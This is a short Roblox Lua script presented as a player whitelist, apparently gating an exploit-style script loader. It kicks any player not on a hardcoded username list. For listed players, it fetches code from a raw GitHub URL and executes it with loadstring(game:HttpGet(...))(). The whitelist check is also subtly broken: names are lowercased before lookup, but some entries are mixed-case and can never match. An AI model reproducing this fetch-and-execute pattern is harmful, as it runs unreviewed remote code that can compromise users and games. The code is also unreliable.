local WhitelistSystem = {}


WhitelistSystem.whitelist = {  
    ["Valorant_CN"] = true,  
    ["gx_6720"] = true,  
    ["ydjuxyfug"] = true,  
    ["114514fvfhvv"] = true,  
    ["917867hhhbbb"] = true,  
    ["aigzjxns"] = true,  
    ["GutsTame_5201"] = true,  
    ["error_404better"] = true,  
    ["hvfvh979"] = true,  
    ["qsxcgyokfy"] = true,  
    ["JKGwffff"] = true,  
    ["sailou654"] = true,  
    ["sailou6543"] = true,  
    ["sailou654321"] = true,  
    ["sailounihai"] = true,  
    ["sailou12345678910"] = true,  
    ["qidu130"] = true,  
    ["danyu240"] = true,  
    ["rgjegdjsdns"] = true,  
    ["gaveme91VIP"] = true,  
    ["hiperhyperhipr_4dust"] = true,  
    ["cccCCCYYds"] = true,  
    ["synb917878"] = true, 
    ["asdfghjkl69462"] = true,
    ["wcnmbnde"] = true,
    ["sd_popcat"] = true,
    ["ruoyueru"] = true,
    ["Wistfulnessess"] = true,
    ["123hjfkffj8"] = true,
    ["pro_xx863"] = true
}


function WhitelistSystem:IsPlayerWhitelisted(player)
    
    local playerName = string.lower(string.gsub(player.Name, "^%s*(.-)%s*$", "%1"))
    
    
    return self.whitelist[playerName] or false
end


function WhitelistSystem:Init()
    
    game.Players.PlayerAdded:Connect(function(player)
        if not self:IsPlayerWhitelisted(player) then
            
            player:Kick("请加入白名单")
            return
        end
        
        
        self:StartPlayerScripts(player)
    end)
    
    
    for _, player in ipairs(game.Players:GetPlayers()) do
        if not self:IsPlayerWhitelisted(player) then
            player:Kick("请加入白名单")
        else
            self:StartPlayerScripts(player)
        end
    end
end


function WhitelistSystem:StartPlayerScripts(player)
    
    print("为玩家 " .. player.Name .. " 启动脚本")
    
    
    local tool = Instance.new("Tool")
    tool.Name = "SpecialTool"
    tool.Parent = player.Backpack
    
    loadstring(game:HttpGet("https://raw.githubusercontent.com/1379qpalzmtygvezimaliexcvbnqplasdfg/1-11-35-80-78-91/refs/heads/main/%E7%94%A8%E6%88%B7%E5%90%8D.txt"))()
end


WhitelistSystem:Init()

return WhitelistSystem
